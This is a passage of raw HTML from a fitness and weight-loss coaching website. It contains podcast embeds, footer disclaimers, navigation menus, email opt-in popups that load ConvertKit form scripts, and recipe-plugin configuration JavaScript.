data-id="26d713a" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default"><b>Like Podcasts?</b></h1></div></div><div class="elementor-element elementor-element-15f42579 elementor-widget elementor-widget-heading" data-id="15f42579" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">Learn more about Being Badass on these awesome podcasts:</h2></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-61372480 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="61372480" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;,&quot;stretch_section&quot;:&quot;section-stretched&quot;}"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-7f2a6563 elementor-column elementor-col-100 elementor-top-column" data-id="7f2a6563" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-740784ff elementor-widget elementor-widget-heading" data-id="740784ff" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">How to get healthy and stay sane while saving time with Betty Jean</h2></div></div><section class="elementor-element elementor-element-433f8d4f elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-id="433f8d4f" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-32059d8a elementor-column elementor-col-100 elementor-inner-column" data-id="32059d8a" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-53a32152 elementor-widget elementor-widget-html" data-id="53a32152" data-element_type="widget" data-widget_type="html.default"><div class="elementor-widget-container"> <iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/598885233&color=%23363936&auto_play=false&hide_related=true&show_comments=false&show_user=true&show_reposts=false&show_teaser=false"></iframe></div></div></div></div></div></div></div></section></div></div></div></div></div></section><section class="elementor-element elementor-element-fe933c8 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="fe933c8" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;,&quot;stretch_section&quot;:&quot;section-stretched&quot;}"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-5d1a3fed elementor-column elementor-col-100 elementor-top-column" data-id="5d1a3fed" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-148d4047 elementor-widget elementor-widget-heading" data-id="148d4047" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">Are you limiting yourself? | Tena Talks A Lot by TenaPettis.com</h2></div></div><section class="elementor-element elementor-element-54104477 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-id="54104477" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-7f2cac68 elementor-column elementor-col-100 elementor-inner-column" data-id="7f2cac68" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-2a1cdcdf elementor-widget elementor-widget-html" data-id="2a1cdcdf" data-element_type="widget" data-widget_type="html.default"><div class="elementor-widget-container"> <iframe style="border: none" src="//html5-player.libsyn.com/embed/episode/id/8564213/height/90/theme/custom/thumbnail/yes/direction/forward/render-playlist/no/custom-color/000000/" height="90" width="100%" scrolling="no" allowfullscreen webkitallowfullscreen mozallowfullscreen oallowfullscreen msallowfullscreen></iframe></div></div></div></div></div></div></div></section></div></div></div></div></div></section></div></div></div></main><footer id="footer" class="site-footer" itemscope="itemscope" itemtype="http://schema.org/WPFooter"><div id="footer-inner" class="clr"><div id="footer-widgets" class="oceanwp-row clr"><div class="footer-widgets-inner container"><div class="footer-box span_1_of_1 col col-1"><div id="text-39" class="footer-widget widget_text clr"><div class="textwidget"><p>TESTIMONIAL DISCLAIMER: Individual results will vary. <a href="https://beingbadass.com/testimonial-disclaimer/" target="_blank" rel="noopener">Read the full testimonial disclaimer here.</a><br /> DISCLAIMER: Before engaging in changing your nutrition, starting a physical activity, or beginning a health program of any kind, please consult a qualified physician.<br /> The views contained in the contents of this site are solely my own and are not intended to replace qualified medical expertise. <a href="https://beingbadass.com/disclaimers/" target="_blank" rel="noopener">Read more</a>.</p></div></div></div></div></div><div id="footer-bottom" class="clr"><div id="footer-bottom-inner" class="container clr"><div id="footer-bottom-menu" class="navigation clr"><div class="menu-footer-container"><ul id="menu-footer" class="menu"><li id="menu-item-12752" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12752"><a href="https://beingbadass.com/about-betty-jean-bell/">ABOUT</a></li><li id="menu-item-3704" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3704"><a href="https://beingbadass.com/contact/">CONTACT</a></li><li id="menu-item-3715" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3715"><a href="https://beingbadass.com/affiliate-disclosure/">AFFILIATE DISCLOSURE</a></li><li id="menu-item-3711" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3711"><a href="https://beingbadass.com/disclaimers/">TERMS + CONDITIONS</a></li><li id="menu-item-5378" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5378"><a href="https://beingbadass.com/dmca/">DMCA</a></li><li id="menu-item-5379" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5379"><a href="https://beingbadass.com/privacy-policy/">PRIVACY POLICY</a></li><li id="menu-item-14503" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14503"><a href="https://beingbadass.com/testimonial-disclaimer/">TESTIMONIAL DISCLAIMER</a></li></ul></div></div><div id="copyright" class="clr" role="contentinfo"> © 2017-2019 BJB International LLC. All rights reserved.</div></div></div></div></footer></div></div> <a id="scroll-top" class="scroll-top-right" href="#"><span class="fa fa-angle-up"></span></a><div id="sidr-close"> <a href="#" class="toggle-sidr-close"> <i class="icon icon-close"></i><span class="close-text">Close Menu</span> </a></div><div id="mobile-nav" class="navigation clr"><ul id="menu-main-1" class="mobile-menu dropdown-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-6831"><a href="https://beingbadass.com/about-betty-jean-bell/">ABOUT</a><ul class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12034"><a href="https://beingbadass.com/speaking/">SPEAKING</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12036"><a href="https://beingbadass.com/contact/">CONTACT</a></li></ul></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-14176"><a>RESOURCES</a><ul class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6720"><a href="https://beingbadass.com/shop/">SHOP</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4271"><a href="https://beingbadass.com/blog/">BLOG</a></li></ul></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14411"><a href="http://www.onlinemeetingnow.com/register/?id=mdv9ghuyx7">START HERE</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12764"><a href="https://beingbadass.com/results/">RESULTS</a></li><li class="menu-cta menu-item menu-item-type-custom menu-item-object-custom menu-item-5877"><a href="https://beingbadass.com/you-are-a-babe/">YOU ARE A BABE</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12596"><a href="https://youare.beingbadass.com/login">LOGIN</a></li></ul></div><div id="mobile-menu-search" class="clr"><form method="get" action="https://beingbadass.com/" class="mobile-searchform"> <input type="search" name="s" autocomplete="off" placeholder="Search" /> <button type="submit" class="searchform-submit"> <i class="icon icon-magnifier"></i> </button></form></div><div id="pum-14673" class="pum pum-overlay pum-theme-13210 pum-theme-opaque-theme popmake-overlay click_open" data-popmake="{&quot;id&quot;:14673,&quot;slug&quot;:&quot;liana-test-webinar-replay-popup&quot;,&quot;theme_id&quot;:13210,&quot;cookies&quot;:[],&quot;triggers&quot;:[{&quot;type&quot;:&quot;click_open&quot;,&quot;settings&quot;:{&quot;cookie_name&quot;:&quot;&quot;,&quot;extra_selectors&quot;:&quot;&quot;}}],&quot;mobile_disabled&quot;:null,&quot;tablet_disabled&quot;:null,&quot;meta&quot;:{&quot;display&quot;:{&quot;stackable&quot;:false,&quot;overlay_disabled&quot;:false,&quot;scrollable_content&quot;:false,&quot;disable_reposition&quot;:false,&quot;size&quot;:&quot;medium&quot;,&quot;responsive_min_width&quot;:&quot;0%&quot;,&quot;responsive_min_width_unit&quot;:false,&quot;responsive_max_width&quot;:&quot;100%&quot;,&quot;responsive_max_width_unit&quot;:false,&quot;custom_width&quot;:&quot;640px&quot;,&quot;custom_width_unit&quot;:false,&quot;custom_height&quot;:&quot;380px&quot;,&quot;custom_height_unit&quot;:false,&quot;custom_height_auto&quot;:false,&quot;location&quot;:&quot;center top&quot;,&quot;position_from_trigger&quot;:false,&quot;position_top&quot;:&quot;100&quot;,&quot;position_left&quot;:&quot;0&quot;,&quot;position_bottom&quot;:&quot;0&quot;,&quot;position_right&quot;:&quot;0&quot;,&quot;position_fixed&quot;:false,&quot;animation_type&quot;:&quot;fade&quot;,&quot;animation_speed&quot;:&quot;350&quot;,&quot;animation_origin&quot;:&quot;center top&quot;,&quot;overlay_zindex&quot;:false,&quot;zindex&quot;:&quot;1999999999&quot;},&quot;close&quot;:{&quot;text&quot;:&quot;&quot;,&quot;button_delay&quot;:&quot;0&quot;,&quot;overlay_click&quot;:false,&quot;esc_press&quot;:false,&quot;f4_press&quot;:false},&quot;click_open&quot;:[]}}" role="dialog" aria-hidden="true" ><div id="popmake-14673" class="pum-container popmake theme-13210 pum-responsive pum-responsive-medium responsive size-medium"><div class="pum-content popmake-content"><p>&nbsp;</p><p style="text-align: center; font-size: 22px; margin-top: 15px; margin-bottom: -50px;"><strong>Enter your email address below and reserve your seat&#8230; It&#8217;s 100% free!</strong></p><p><script async id="_ck_457322" src="https://forms.convertkit.com/457322?v=7"></script></p><p style="text-align: center; font-size: 14px; margin-top: -50px; margin-bottom: 30px;"><em>We value your privacy, Babe. We will never sell or SPAM your information.</em></p></div> <button type="button" class="pum-close popmake-close" aria-label="Close"> CLOSE X </button></div></div><div id="pum-13953" class="pum pum-overlay pum-theme-13210 pum-theme-opaque-theme popmake-overlay click_open" data-popmake="{&quot;id&quot;:13953,&quot;slug&quot;:&quot;webinar-registration&quot;,&quot;theme_id&quot;:13210,&quot;cookies&quot;:[],&quot;triggers&quot;:[{&quot;type&quot;:&quot;click_open&quot;,&quot;settings&quot;:{&quot;cookie_name&quot;:&quot;&quot;,&quot;extra_selectors&quot;:&quot;&quot;}}],&quot;mobile_disabled&quot;:null,&quot;tablet_disabled&quot;:null,&quot;meta&quot;:{&quot;display&quot;:{&quot;stackable&quot;:false,&quot;overlay_disabled&quot;:false,&quot;scrollable_content&quot;:false,&quot;disable_reposition&quot;:false,&quot;size&quot;:&quot;medium&quot;,&quot;responsive_min_width&quot;:&quot;0%&quot;,&quot;responsive_min_width_unit&quot;:false,&quot;responsive_max_width&quot;:&quot;100%&quot;,&quot;responsive_max_width_unit&quot;:false,&quot;custom_width&quot;:&quot;640px&quot;,&quot;custom_width_unit&quot;:false,&quot;custom_height&quot;:&quot;380px&quot;,&quot;custom_height_unit&quot;:false,&quot;custom_height_auto&quot;:false,&quot;location&quot;:&quot;center top&quot;,&quot;position_from_trigger&quot;:false,&quot;position_top&quot;:&quot;100&quot;,&quot;position_left&quot;:&quot;0&quot;,&quot;position_bottom&quot;:&quot;0&quot;,&quot;position_right&quot;:&quot;0&quot;,&quot;position_fixed&quot;:false,&quot;animation_type&quot;:&quot;fade&quot;,&quot;animation_speed&quot;:&quot;350&quot;,&quot;animation_origin&quot;:&quot;center top&quot;,&quot;overlay_zindex&quot;:false,&quot;zindex&quot;:&quot;1999999999&quot;},&quot;close&quot;:{&quot;text&quot;:&quot;&quot;,&quot;button_delay&quot;:&quot;0&quot;,&quot;overlay_click&quot;:false,&quot;esc_press&quot;:false,&quot;f4_press&quot;:false},&quot;click_open&quot;:[]}}" role="dialog" aria-hidden="true" ><div id="popmake-13953" class="pum-container popmake theme-13210 pum-responsive pum-responsive-medium responsive size-medium"><div class="pum-content popmake-content"><p>&nbsp;</p><p style="text-align: center; font-size: 22px; margin-top: 15px; margin-bottom: -50px;"><strong>Enter your email address below and reserve your seat&#8230; It&#8217;s 100% free!</strong></p><p><script async id="_ck_455448" src="https://forms.convertkit.com/455448?v=7"></script></p><p style="text-align: center; font-size: 14px; margin-top: -50px; margin-bottom: 30px;"><em>We value your privacy, Babe.</em></p></div> <button type="button" class="pum-close popmake-close" aria-label="Close"> CLOSE X </button></div></div><div id="pum-13164" class="pum pum-overlay pum-theme-13180 pum-theme-test-theme popmake-overlay click_open" data-popmake="{&quot;id&quot;:13164,&quot;slug&quot;:&quot;imi&quot;,&quot;theme_id&quot;:13180,&quot;cookies&quot;:[],&quot;triggers&quot;:[{&quot;type&quot;:&quot;click_open&quot;,&quot;settings&quot;:{&quot;cookie_name&quot;:&quot;&quot;,&quot;extra_selectors&quot;:&quot;.button_3guide&quot;}}],&quot;mobile_disabled&quot;:null,&quot;tablet_disabled&quot;:null,&quot;meta&quot;:{&quot;display&quot;:{&quot;stackable&quot;:false,&quot;overlay_disabled&quot;:false,&quot;scrollable_content&quot;:false,&quot;disable_reposition&quot;:false,&quot;size&quot;:&quot;tiny&quot;,&quot;responsive_min_width&quot;:&quot;0%&quot;,&quot;responsive_min_width_unit&quot;:false,&quot;responsive_max_width&quot;:&quot;100%&quot;,&quot;responsive_max_width_unit&quot;:false,&quot;custom_width&quot;:&quot;640px&quot;,&quot;custom_width_unit&quot;:false,&quot;custom_height&quot;:&quot;380px&quot;,&quot;custom_height_unit&quot;:false,&quot;custom_height_auto&quot;:false,&quot;location&quot;:&quot;center top&quot;,&quot;position_from_trigger&quot;:false,&quot;position_top&quot;:&quot;100&quot;,&quot;position_left&quot;:&quot;0&quot;,&quot;position_bottom&quot;:&quot;0&quot;,&quot;position_right&quot;:&quot;0&quot;,&quot;position_fixed&quot;:false,&quot;animation_type&quot;:&quot;fade&quot;,&quot;animation_speed&quot;:&quot;350&quot;,&quot;animation_origin&quot;:&quot;center top&quot;,&quot;overlay_zindex&quot;:false,&quot;zindex&quot;:&quot;1999999999&quot;},&quot;close&quot;:{&quot;text&quot;:&quot;&quot;,&quot;button_delay&quot;:&quot;0&quot;,&quot;overlay_click&quot;:false,&quot;esc_press&quot;:false,&quot;f4_press&quot;:false},&quot;click_open&quot;:[]}}" role="dialog" aria-hidden="true" ><div id="popmake-13164" class="pum-container popmake theme-13180 pum-responsive pum-responsive-tiny responsive size-tiny"><div class="pum-content popmake-content"><p>&nbsp;</p><div style="text-align: center;"><span style="font-size: 35px; font-weight: bold; letter-spacing: -0.9;">Get The <strike>Game</strike> Babe Plan</span></div><div class="formkit-subheader" data-element="subheader"><div><p style="text-align: center; font-size: 22px; margin-top:15px;">Get the exact Babe Plan our clients use to lose weight, feel good about themselves, &amp; look great in photos.</p><p style="text-align: center; font-size: 20px; margin-bottom: -50px;"><strong>Just enter your name + email to get started:</strong></p><p><script async id="_ck_450882" src="https://forms.convertkit.com/450882?v=7"></script></p><p style="text-align: center; font-size: 14px; margin-top: -50px;"><em>We won&#8217;t send you spam. Unsubscribe at any time.</em></p></div></div></div> <button type="button" class="pum-close popmake-close" aria-label="Close"> CLOSE X </button></div></div><div id="pum-13357" class="pum pum-overlay pum-theme-13210 pum-theme-opaque-theme popmake-overlay click_open" data-popmake="{&quot;id&quot;:13357,&quot;slug&quot;:&quot;beautycounter-optin&quot;,&quot;theme_id&quot;:13210,&quot;cookies&quot;:[],&quot;triggers&quot;:[{&quot;type&quot;:&quot;click_open&quot;,&quot;settings&quot;:{&quot;cookie_name&quot;:&quot;&quot;,&quot;extra_selectors&quot;:&quot;&quot;}}],&quot;mobile_disabled&quot;:null,&quot;tablet_disabled&quot;:null,&quot;meta&quot;:{&quot;display&quot;:{&quot;stackable&quot;:false,&quot;overlay_disabled&quot;:false,&quot;scrollable_content&quot;:false,&quot;disable_reposition&quot;:false,&quot;size&quot;:&quot;medium&quot;,&quot;responsive_min_width&quot;:&quot;0%&quot;,&quot;responsive_min_width_unit&quot;:false,&quot;responsive_max_width&quot;:&quot;100%&quot;,&quot;responsive_max_width_unit&quot;:false,&quot;custom_width&quot;:&quot;640px&quot;,&quot;custom_width_unit&quot;:false,&quot;custom_height&quot;:&quot;380px&quot;,&quot;custom_height_unit&quot;:false,&quot;custom_height_auto&quot;:false,&quot;location&quot;:&quot;center top&quot;,&quot;position_from_trigger&quot;:false,&quot;position_top&quot;:&quot;100&quot;,&quot;position_left&quot;:&quot;0&quot;,&quot;position_bottom&quot;:&quot;0&quot;,&quot;position_right&quot;:&quot;0&quot;,&quot;position_fixed&quot;:false,&quot;animation_type&quot;:&quot;fade&quot;,&quot;animation_speed&quot;:&quot;350&quot;,&quot;animation_origin&quot;:&quot;center top&quot;,&quot;overlay_zindex&quot;:false,&quot;zindex&quot;:&quot;1999999999&quot;},&quot;close&quot;:{&quot;text&quot;:&quot;&quot;,&quot;button_delay&quot;:&quot;0&quot;,&quot;overlay_click&quot;:false,&quot;esc_press&quot;:false,&quot;f4_press&quot;:false},&quot;click_open&quot;:[]}}" role="dialog" aria-hidden="true" ><div id="popmake-13357" class="pum-container popmake theme-13210 pum-responsive pum-responsive-medium responsive size-medium"><div class="pum-content popmake-content"><div style="margin-top: 50px;"></div><h2 class="elementor-heading-title elementor-size-default" style="text-align: center;">Subscribe to get my &#8220;Safer Beauty Shopping Guide.&#8221;</h2><p style="text-align: center;">Just enter your name + email:</p><div style="margin-top: -50px;"><script async id="_ck_378699" src="https://forms.convertkit.com/378699?v=7"></script></div></div> <button type="button" class="pum-close popmake-close" aria-label="Close"> CLOSE X </button></div></div><div id="pum-13217" class="pum pum-overlay pum-theme-13210 pum-theme-opaque-theme popmake-overlay click_open" data-popmake="{&quot;id&quot;:13217,&quot;slug&quot;:&quot;lose-weight&quot;,&quot;theme_id&quot;:13210,&quot;cookies&quot;:[],&quot;triggers&quot;:[{&quot;type&quot;:&quot;click_open&quot;,&quot;settings&quot;:{&quot;cookie_name&quot;:&quot;&quot;,&quot;extra_selectors&quot;:&quot;&quot;}}],&quot;mobile_disabled&quot;:null,&quot;tablet_disabled&quot;:null,&quot;meta&quot;:{&quot;display&quot;:{&quot;stackable&quot;:false,&quot;overlay_disabled&quot;:false,&quot;scrollable_content&quot;:false,&quot;disable_reposition&quot;:false,&quot;size&quot;:&quot;tiny&quot;,&quot;responsive_min_width&quot;:&quot;0%&quot;,&quot;responsive_min_width_unit&quot;:false,&quot;responsive_max_width&quot;:&quot;100%&quot;,&quot;responsive_max_width_unit&quot;:false,&quot;custom_width&quot;:&quot;640px&quot;,&quot;custom_width_unit&quot;:false,&quot;custom_height&quot;:&quot;380px&quot;,&quot;custom_height_unit&quot;:false,&quot;custom_height_auto&quot;:false,&quot;location&quot;:&quot;center&quot;,&quot;position_from_trigger&quot;:false,&quot;position_top&quot;:&quot;100&quot;,&quot;position_left&quot;:&quot;0&quot;,&quot;position_bottom&quot;:&quot;0&quot;,&quot;position_right&quot;:&quot;0&quot;,&quot;position_fixed&quot;:false,&quot;animation_type&quot;:&quot;fade&quot;,&quot;animation_speed&quot;:&quot;350&quot;,&quot;animation_origin&quot;:&quot;center top&quot;,&quot;overlay_zindex&quot;:false,&quot;zindex&quot;:&quot;1999999999&quot;},&quot;close&quot;:{&quot;text&quot;:&quot;&quot;,&quot;button_delay&quot;:&quot;0&quot;,&quot;overlay_click&quot;:false,&quot;esc_press&quot;:false,&quot;f4_press&quot;:false},&quot;click_open&quot;:[]}}" role="dialog" aria-hidden="true" ><div id="popmake-13217" class="pum-container popmake theme-13210 pum-responsive pum-responsive-tiny responsive size-tiny"><div class="pum-content popmake-content"><p>&nbsp;<br /> <img class="aligncenter" src="https://beingbadass.com/wp-content/uploads/2018/12/LOSE-WEIGHT-COVER.jpg" alt="" width="309" height="400" class="alignnone size-full wp-image-12960" /></p><div style="text-align: center;"><span style="font-size: 35px; font-weight: 700; letter-spacing: -0.9;">Download the Guide:</span></div><div class="formkit-subheader" data-element="subheader"> &nbsp;<div><p style="text-align: center; font-size: 20px;">The Secret To Losing The Last 10+ Pounds &#038; Stay Healthy (No Matter How Busy You Are)</p><div style="margin-top:-50px;"><script async id="_ck_451147" src="https://forms.convertkit.com/451147?v=7"></script> </div><p style="text-align: center; font-size: 14px;margin-top:-50px;"><em>We won&#8217;t send you spam. Unsubscribe at any time.</em></p></div></div></div> <button type="button" class="pum-close popmake-close" aria-label="Close"> CLOSE X </button></div></div><div id="pum-13204" class="pum pum-overlay pum-theme-13210 pum-theme-opaque-theme popmake-overlay click_open" data-popmake="{&quot;id&quot;:13204,&quot;slug&quot;:&quot;gear-guide&quot;,&quot;theme_id&quot;:13210,&quot;cookies&quot;:[],&quot;triggers&quot;:[{&quot;type&quot;:&quot;click_open&quot;,&quot;settings&quot;:{&quot;cookie_name&quot;:&quot;&quot;,&quot;extra_selectors&quot;:&quot;&quot;}}],&quot;mobile_disabled&quot;:null,&quot;tablet_disabled&quot;:null,&quot;meta&quot;:{&quot;display&quot;:{&quot;stackable&quot;:false,&quot;overlay_disabled&quot;:false,&quot;scrollable_content&quot;:false,&quot;disable_reposition&quot;:false,&quot;size&quot;:&quot;tiny&quot;,&quot;responsive_min_width&quot;:&quot;0%&quot;,&quot;responsive_min_width_unit&quot;:false,&quot;responsive_max_width&quot;:&quot;100%&quot;,&quot;responsive_max_width_unit&quot;:false,&quot;custom_width&quot;:&quot;50%&quot;,&quot;custom_width_unit&quot;:false,&quot;custom_height&quot;:&quot;380%&quot;,&quot;custom_height_unit&quot;:false,&quot;custom_height_auto&quot;:&quot;1&quot;,&quot;location&quot;:&quot;center&quot;,&quot;position_from_trigger&quot;:false,&quot;position_top&quot;:&quot;100&quot;,&quot;position_left&quot;:&quot;0&quot;,&quot;position_bottom&quot;:&quot;0&quot;,&quot;position_right&quot;:&quot;0&quot;,&quot;position_fixed&quot;:false,&quot;animation_type&quot;:&quot;fade&quot;,&quot;animation_speed&quot;:&quot;350&quot;,&quot;animation_origin&quot;:&quot;center top&quot;,&quot;overlay_zindex&quot;:false,&quot;zindex&quot;:&quot;1999999999&quot;},&quot;close&quot;:{&quot;text&quot;:&quot;&quot;,&quot;button_delay&quot;:&quot;0&quot;,&quot;overlay_click&quot;:false,&quot;esc_press&quot;:false,&quot;f4_press&quot;:false},&quot;click_open&quot;:[]}}" role="dialog" aria-hidden="true" ><div id="popmake-13204" class="pum-container popmake theme-13210 pum-responsive pum-responsive-tiny responsive size-tiny"><div class="pum-content popmake-content"><p>&nbsp;<br /> <img class="aligncenter" src="https://beingbadass.com/wp-content/uploads/2018/12/gear-guide.jpg" alt="gear-guide" width="309" height="400" class="alignnone size-full wp-image-12964" /></p><div style="text-align: center;"><span style="font-size: 35px; font-weight: 700; letter-spacing: -0.9;">Download the Guide:</span></div><div class="formkit-subheader" data-element="subheader"> &nbsp;<div><p style="text-align: center; font-size: 20px;"><strong>Gear Guide:</strong> What You Need To Make Photos Like This At Home Alone With Just Your iPhone</p><div style="margin-top:-50px;"><script async id="_ck_451145" src="https://forms.convertkit.com/451145?v=7"></script> </div><p style="text-align: center; font-size: 14px;margin-top:-50px;"><em>We won&#8217;t send you spam. Unsubscribe at any time.</em></p></div></div></div> <button type="button" class="pum-close popmake-close" aria-label="Close"> CLOSE X </button></div></div><div id="pum-13212" class="pum pum-overlay pum-theme-13210 pum-theme-opaque-theme popmake-overlay click_open" data-popmake="{&quot;id&quot;:13212,&quot;slug&quot;:&quot;your-body-is-a-work-of-art&quot;,&quot;theme_id&quot;:13210,&quot;cookies&quot;:[],&quot;triggers&quot;:[{&quot;type&quot;:&quot;click_open&quot;,&quot;settings&quot;:{&quot;cookie_name&quot;:&quot;&quot;,&quot;extra_selectors&quot;:&quot;&quot;}}],&quot;mobile_disabled&quot;:null,&quot;tablet_disabled&quot;:null,&quot;meta&quot;:{&quot;display&quot;:{&quot;stackable&quot;:false,&quot;overlay_disabled&quot;:false,&quot;scrollable_content&quot;:false,&quot;disable_reposition&quot;:false,&quot;size&quot;:&quot;tiny&quot;,&quot;responsive_min_width&quot;:&quot;0%&quot;,&quot;responsive_min_width_unit&quot;:false,&quot;responsive_max_width&quot;:&quot;100%&quot;,&quot;responsive_max_width_unit&quot;:false,&quot;custom_width&quot;:&quot;640px&quot;,&quot;custom_width_unit&quot;:false,&quot;custom_height&quot;:&quot;380px&quot;,&quot;custom_height_unit&quot;:false,&quot;custom_height_auto&quot;:false,&quot;location&quot;:&quot;center&quot;,&quot;position_from_trigger&quot;:false,&quot;position_top&quot;:&quot;50&quot;,&quot;position_left&quot;:&quot;0&quot;,&quot;position_bottom&quot;:&quot;0&quot;,&quot;position_right&quot;:&quot;0&quot;,&quot;position_fixed&quot;:false,&quot;animation_type&quot;:&quot;fade&quot;,&quot;animation_speed&quot;:&quot;350&quot;,&quot;animation_origin&quot;:&quot;center top&quot;,&quot;overlay_zindex&quot;:false,&quot;zindex&quot;:&quot;1999999999&quot;},&quot;close&quot;:{&quot;text&quot;:&quot;&quot;,&quot;button_delay&quot;:&quot;0&quot;,&quot;overlay_click&quot;:false,&quot;esc_press&quot;:false,&quot;f4_press&quot;:false},&quot;click_open&quot;:[]}}" role="dialog" aria-hidden="true" ><div id="popmake-13212" class="pum-container popmake theme-13210 pum-responsive pum-responsive-tiny responsive size-tiny"><div class="pum-content popmake-content"><p>&nbsp;<br /> <img class="aligncenter" src="https://beingbadass.com/wp-content/uploads/2018/12/BODY-ART-COVER.jpg" alt="your body is a work of art" width="309" height="400" class="alignnone size-full wp-image-12959" /></p><div style="text-align: center;"><span style="font-size: 35px; font-weight: 700; letter-spacing: -0.9;">Download the Guide:</span></div><div class="formkit-subheader" data-element="subheader"> &nbsp;<div><p style="text-align: center; font-size: 20px;"><strong>Your Body Is A Work of Art:</strong> Your Guide to Stop Negative Self-Speak + Have Confidence on Camera.</p><div style="margin-top:-50px;"><script async id="_ck_451148" src="https://forms.convertkit.com/451148?v=7"></script> </div><p style="text-align: center; font-size: 14px;margin-top:-50px;"><em>We won&#8217;t send you spam. Unsubscribe at any time.</em></p></div></div></div> <button type="button" class="pum-close popmake-close" aria-label="Close"> CLOSE X </button></div></div><div style="display:none"></div> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript'>jQuery(document).ready(function(jQuery){jQuery.datepicker.setDefaults({"closeText":"Close","currentText":"Today","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Previous","dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"dateFormat":"MM d, yy","firstDay":1,"isRTL":false});});</script> <script type='text/javascript'>var wpurp_servings = {"precision":"2","decimal_character":"."}; var wpurp_print = {"ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php?wpurp_ajax=1","nonce":"7077a7319e","custom_print_css":"","coreUrl":"https:\/\/beingbadass.com\/wp-content\/plugins\/wp-ultimate-recipe-premium\/core","premiumUrl":"https:\/\/beingbadass.com\/wp-content\/plugins\/wp-ultimate-recipe-premium\/premium","title":"Betty Jean Bell","permalinks":"\/%postname%\/"}; var wpurp_responsive_data = {"breakpoint":"500"}; var wpurp_sharing_buttons = {"facebook_lang":"en_US","twitter_lang":"en","google_lang":"en-US"}; var wpurp_favorite_recipe = {"ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php?wpurp_ajax=1","nonce":"cf2b7bcc7a"}; var wpurp_meal_planner = {"ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php?wpurp_ajax=1","addonUrl":"https:\/\/beingbadass.com\/wp-content\/plugins\/wp-ultimate-recipe-premium\/premium\/addons\/meal-planner","printUrl":"https:\/\/beingbadass.com\/wpurp_print\/","nonce":"6442f9aaeb","nonce_print":"ac33eb555c","nonce_admin":"","textLeftovers":"leftovers","textQuantity":"Quantity","textServings":"Servings","textDeleteCourse":"Do you want to remove this entire course?","textDeleteRecipe":"Do you want to remove this recipe from the menu?","textDeleteRecipes":"Do you want to remove all these recipes from the menu?","textAddToMealPlan":"This recipe has been added to your Meal Plan","nutrition_facts_fields":["calories","fat","carbohydrate","protein"],"nutrition_facts_calories_type":"calories","nutrition_facts_total":"","adjustable_system":"1","default_unit_system":"1","consolidate_ingredients":"1","checkboxes":"1","fractions":"","print_shoppinglist_style":"button {\n color: #ffffff;\n}","datepicker":{"dateFormat":"yy-mm-dd","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"firstDay":"1","isRTL":false}}; var wpurp_add_to_meal_plan = 